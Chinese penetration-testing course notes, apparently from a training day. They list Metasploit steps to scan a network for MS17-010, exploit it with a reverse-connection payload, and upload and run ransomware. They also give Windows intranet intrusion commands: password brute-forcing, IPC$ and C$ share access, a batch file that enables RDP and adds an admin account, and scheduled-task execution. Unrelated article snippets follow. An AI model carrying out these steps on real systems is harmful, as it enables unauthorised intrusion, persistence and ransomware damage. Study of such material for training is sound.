网络安全实训Day16

网络空间安全实训-渗透测试

  • 漏洞扫描

    • 定义

      • 扫描和探测目标范围内的主机存在哪些安全漏洞,或扫描目标范围内的那些主机存在某个指定的漏洞

    • 漏扫工具

      • AWVS

      • APPScan

      • MSF

    • 使用MSF扫描漏洞并利用

      • 1.搜索需要的攻击模块

        • search ms17-010

      • 2.使用攻击模块

        • use 模块名称

      • 3.设置扫描范围

        • set rhosts 192.168.12.0/24

      • 4.设置扫描线程

        • set thread 50

      • 5.开始扫描

        • run

      • 6.更换攻击模块为漏洞利用

      • 7.查看可用攻击载荷

        • show payloads

      • 8.设置攻击载荷

        • set payload 攻击载荷名称

      • 9.设置被攻击主机IP地址

        • set rhost IP地址

      • 10.设置反向连接的控制机IP地址

        • set lhost IP地址

      • 11.开始攻击

        • run

      • 12.上传病毒

        • upload 本地文件路径 远程主机路径

      • 13.执行勒索病毒

        • execute -f 勒索病毒路径

  • Windows内网渗透

    • 1.扫描对方操作系统和开放的端口

      • 确定对方是Windows系统开启了445接口

    • 2.针对该端口服务暴力破解Windows管理员账号密码

    • 3.与对方建立空连接

      • net use \\对方ip地址\ipc$

      • 需要输入对方的管理员账号密码

    • 4.制作开启RDP和创建管理员账户的脚本bat

      • REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

      • net user 用户名 密码 /add

      • net local group administrator 用户名 /add

    • 5.访问对方C盘默认共享,将bat复制到对方C盘

      • 在文件资源管理器地址栏中输入 \\对方IP地址\c$

    • 6.查看对方的系统时间

      • net time \\对方IP地址

    • 7.给对方创建任务计划,定时执行BAT程序,开启RDP

      • at \\对方ip地址 时间 执行的文件路径

    • 8.使用先前创建的管理员账号登陆RDP

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/590263.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

jsp校园商城派送系统Myeclipse开发mysql数据库web结构java编程计算机网页项目

一、源码特点 JSP 校园商城派送系统 是一套完善的web设计系统,对理解JSP java编程开发语言有帮助,系统具有完整的源代码和数据库,系统采用serlvetdaobean mvc 模式,系统主要采用B/S模式 开发。开发环境为TOMCAT7.0,Myeclipse8.…

每日一题-贪心算法

目录 前言 买入股票的最佳时机(1) 买入股票的最好时机(2) 前言 当你踏上贪心算法的旅程,仿佛置身于一场智慧的盛宴,每一步都是对问题解决方案的审慎选择,每一次决策都是对最优解的向往。贪心算法以其简洁高效的特性,被广泛运用于…

yolov5-pytorch-Ultralytics训练+预测+报错处理记录

一、前言 玩一段时间大模型,也该回归一下图像识别。本项目用于记录使用基于Ultralytics的yolov5进行目标检测测试。为什么用Ultralytics呢?答案有3 1、其良好的生态,方便我们部署到其它语言和设备上。因此本次测试结论:大坑没有&…

基于YOLOv8的水稻虫害识别系统,加入BiLevelRoutingAttention注意力进行创新优化

💡💡💡本文摘要:基于YOLOv8的水稻虫害识别,阐述了整个数据制作和训练可视化过程,并加入BiLevelRoutingAttention注意力进行优化,最终mAP从原始的 0.697提升至0.732 博主简介 AI小怪兽&#xff…

pyqt标签常用qss格式设置

pyqt标签常用qss格式设置 QSS介绍标签常用的QSS设置效果代码 QSS介绍 Qt Style Sheets (QSS) 是 Qt 框架中用于定制应用程序界面样式的一种语言。它类似于网页开发中的 CSS(Cascading Style Sheets),但专门为 Qt 应用程序设计。使用 QSS&…

[信息收集]-端口扫描--Nmap

端口号 端口号的概念属于计算机网络的传输层,标识这些不同的应用程序和服务而存在的。通过使用不同的端口号,传输层可以将接收到的数据包准确地传递给目标应用程序。 80:HTTP(超文本传输协议)用于Web浏览器访问网页 …

怎么证明E[E(X|Y,Z)Y]= E(X|Y)

性质8的证明 物理意义

中霖教育:资产评估师报考攻略

一、报考条件 1 参加资产评估师考试的基本条件:为中国公民 2 具有完全民事行为能力 3 具有高等院校专科以上(含专科)学历 符合上述报名条件,暂未取得学历(学位)的大学生可报名参加考试 二、报名时间 报名时间:2024年3月25日9:00至5月10日24:00 补…

《有限元分析及应用》《有限元分析基础教程》-曾攀-清华大学|pdf电子书+有限元分析及应用视频教程(全85讲) 曾攀、雷丽萍 ​​​+课件PPT

专栏导读 作者简介:工学博士,高级工程师,专注于工业软件算法研究本文已收录于专栏:《有限元编程从入门到精通》本专栏旨在提供 1.以案例的形式讲解各类有限元问题的程序实现,并提供所有案例完整源码;2.单元…

分割链表----一道题目的3种不同的解法

1.题目概述 以这个题目的事例作为例子,我们看一下这个题目到底是什么意思(Leedcode好多小伙伴说看不懂题目是什么意思),就是比如一个x3,经过我们的程序执行之后;大于3的在这个链表的后面,小于3的…

【资源分享】CAD Map 3D2024安装教程

::: block-1 “时问桫椤”是一个致力于为本科生到研究生教育阶段提供帮助的不太正式的公众号。我们旨在在大家感到困惑、痛苦或面临困难时伸出援手。通过总结广大研究生的经验,帮助大家尽早适应研究生生活,尽快了解科研的本质。祝一切顺利!—…

【深度学习】第一门课 神经网络和深度学习 Week 3 浅层神经网络

🚀Write In Front🚀 📝个人主页:令夏二十三 🎁欢迎各位→点赞👍 收藏⭐️ 留言📝 📣系列专栏:深度学习 💬总结:希望你看完之后,能对…

Java Swing手搓童年坦克大战游戏(III)

坦克大战豪华山寨版二期工程 计划:实现【道具功能】【分数统计、排行榜】【多种类型敌军坦克派遣】【自建地图】【游戏存档读档】【联网实现双人配合】等,修复一些严重的bug。由于功能比较多,目测会分多篇文章记录…… 前言 通过对原游戏的…

删除链表中等于给定值 val 的所有结点(三种方法深入解析)

又见面啦,接下来的链表相关Oj题目我会根据我自己的理解来给大家讲解,包括解析和代码,希望你可以对链表有更加深入的理解!! 题目: 先上链接: OJ题目 给你一个链表的头节点 head 和一个整数 va…

Mac 安装 JDK21 流程

一、下载JDK21 访问Oracle官方网站或选择OpenJDK作为替代品。Oracle JDK从11版本开始是商业的,可能需要支付费用。OpenJDK是一个免费开源选项。 Oracle JDK官方网站:Oracle JDK Downloads OpenJDK官方网站:OpenJDK Downloads 这里以JDK21为…

生成gitee公钥

1、打开设置 2、设置SSH公钥 3、生成公钥 4、复制终端输出的公钥,放到这里,标题随便取。 5、测试 ssh -T gitgitee.com 最后用这个测试

springboot + slf4j + log4j2

<!--Web依赖--> <dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-web</artifactId><exclusions><exclusion><groupId>org.springframework.boot</groupId><artifact…

QT创造一个新的类(柱状图的类),并关联属性和方法

1.以在UI上添加柱状图的类为例&#xff08;Histogram&#xff09; #ifndef STUDY_HISTOGRAM_H #define STUDY_HISTOGRAM_H#include <QVector> #include <QWidget>// 前向声明 QT_BEGIN_NAMESPACE class QColor; class QRect; class QString; class QPaintDevice; …

vue3 element-plus 让el-container占满屏幕

在刚开始用element-plus的布局时&#xff0c;发现无法占满屏幕&#xff1a; 在App.vue中添加如下css代码&#xff1a; <style>html, body, #app {margin: 0;padding: 0;height: 100%;} </style>同时布局代码所在的component如下所示&#xff1a; <template&g…

亚马逊云科技AWS免费证书-EC2服务器设计(含题库)

亚马逊云AWS官方程序员专属免费证书又来了&#xff01;这次证书是关于AWS EC2实例的设计和搭建&#xff0c;EC2作为AWS服务的核心&#xff0c;是学好AWS的第一步。强推没有任何AWS背景和转码的小伙伴去学&#xff01;学完也能变成AWS开发大神&#xff01; 证书名字叫Getting St…